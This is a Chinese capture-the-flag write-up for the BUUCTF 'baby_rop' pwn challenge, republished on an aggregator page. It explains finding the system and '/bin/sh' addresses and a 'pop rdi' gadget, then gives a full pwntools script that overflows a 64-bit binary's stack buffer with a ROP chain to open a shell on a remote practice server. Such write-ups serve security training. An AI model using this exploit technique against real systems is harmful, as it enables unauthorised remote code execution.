[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop - 走看看

zoukankan html css js c++ java

[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop

附件

步骤：
例行检查，64位，开启了NX保护

试运行一下程序，看这个情况，当我们输入太长字符串的时候会报错

64位ida载入，shift+f12查看程序里的字符串，看到了system 和 ‘/bin/sh’

双击跟进，ctrl+x查看一下哪里调用了字符串，没有找到函数，只找到了地址
shell=0x601048

system=0x400496

找到输入点，没有限制v4读入的数据，可以造成溢出，跟pwn16差不多，唯一的区别就是64位程序传参需要用到寄存器，我们找一下设置rdi寄存器的位置
```
ROPgadget --binary babyrop |grep "pop rdi"
```
rdi=0x400683

EXP:
```
from pwn import*

r=remote('node3.buuoj.cn',25853)

shell=0x601048
system=0x400496
rdi=0x400683

payload='a'*(0x10+8)+p64(rdi)+p64(shell)+p64(system)

r.sendline(payload)
r.interactive()
```
flag不在根目录下，需要我们找一下，利用find -name flag找一下
查看全文

相关阅读:
本地安装xssing
php弱类型
 XEE介绍
 XML注入介绍--XXE，XEE,xpath等
 MySQL注入load_file常用路径
 Sql注入中连接字符串常用函数
 三十三 Python分布式爬虫打造搜索引擎Scrapy精讲—数据收集(Stats Collection)
三十二 Python分布式爬虫打造搜索引擎Scrapy精讲—scrapy的暂停与重启
 三十一 Python分布式爬虫打造搜索引擎Scrapy精讲—chrome谷歌浏览器无界面运行、scrapy-splash、splinter
三十 Python分布式爬虫打造搜索引擎Scrapy精讲—将selenium操作谷歌浏览器集成到scrapy中

原文地址：https://www.cnblogs.com/xlrp/p/14273717.html

Copyright © 2011-2022 走看看